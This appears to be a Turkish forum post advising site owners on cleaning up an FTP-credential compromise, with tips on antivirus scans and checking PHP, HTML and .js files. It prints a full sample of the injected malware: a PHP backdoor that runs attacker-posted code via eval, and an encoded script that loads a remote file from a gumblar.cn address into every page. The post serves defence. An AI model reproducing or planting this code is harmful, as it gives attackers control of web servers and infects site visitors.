ne idüğü belirsin ftp programları kullanmayın, veya ne idüğü belirsiz crack programlarıda kullanmayın, öncelikle sisteminize adam akllı bir antivirüs yükleyin, ve ad aware veya awc yükleyin, taramanız bittikten sonra, ftp ye girin tüm php dosyalarının headerlerinini ve html dosyalarının <bodY> öncesini inceleyin göreceksiniz kodları
hepsini silin, sorun kalmaz, müşterimizede aynısı oldu, ne yazıkki müşterimizin webmasteri güncellemeyi yaktıktan sonra bu olay gerçekleşti ve webmaster trojan ortaya çıktıktan sonra kayıplara karıştı, sanırım birileri halletsede bende geri dönsem diyordur..
bu arada .js dosyalarına da bakın, onlarada %100 kod atmıştır
php dosyalarına attığı örnek kod
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih4dmcpe3ZhciB5NDh2PSd2YXIsMjAsNjEsM2QsMjJTY3JpcHRFbmdpLDZlZSwyMiwyY2IsM2QsMjJWZXJzLDY5LDZmbigpLDJiLDIyLDJjaiwzZCwyMiwyMiwyY3UsM2RuYXYsNjlnYXQsNmZyLDJldXNlckFnLDY1bnQsM2IsNjksNjYoKHUsMmVpLDZlZGV4T2YoLDIyVyw2OSw2ZSwyMiksM2UwKSwyNiwyNiwyOHUsMmUsNjluZGUsNzhPZigsMjJOVCwyMDYsMjIpLDNjMCksMjYsMjYoZG9jdW1lLDZldCwyZWNvLDZmLDZiaWUsMmUsNjluLDY0ZXgsNGZmKCwyMm1pZWssM2QxLDIyKSwzYzApLDI2LDI2KHR5cGUsNmZmKHpydnosNzRzKSwyMSwzZHR5cGVvZigsMjJBLDIyKSwyOSwyOSw3YnpydnosNzRzLDNkLDIyQSwyMiwzYmV2LDYxLDZjLDI4LDIyaWYsMjh3aSw2ZSw2NG93LDJlLDIyK2ErLDIyKWosM2QsNmErLDIyLDJiYSwyYiwyMiw0ZCw2MWpvciwyMitiLDJiYSssMjJNaSw2ZSw2ZnIsMjIrLDYyK2EsMmIsMjIsNDIsNzVpbGQsMjIrYissMjJqLDNiLDIyLDI5LDNiZG9jLDc1bWVudCwyZXcsNzJpLDc0ZSwyOCwyMiwzY3MsNjNyaSw3MHQsMjBzcmMsM2QsMmYsMmZndW1ibGFyLDJlY24sMmZyLDczcywyZiwzZiw2OWQsM2QsMjIsMmJqKywyMiwzZSwzYyw1YywyZiw3M2NyaXB0LDNlLDIyKSwzYiw3ZCc7dmFyIFk1MUI9eTQ4di5yZXBsYWNlKHh2ZywnJScpO2V2YWwodW5lc2NhcGUoWTUxQikpfSkoLywvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>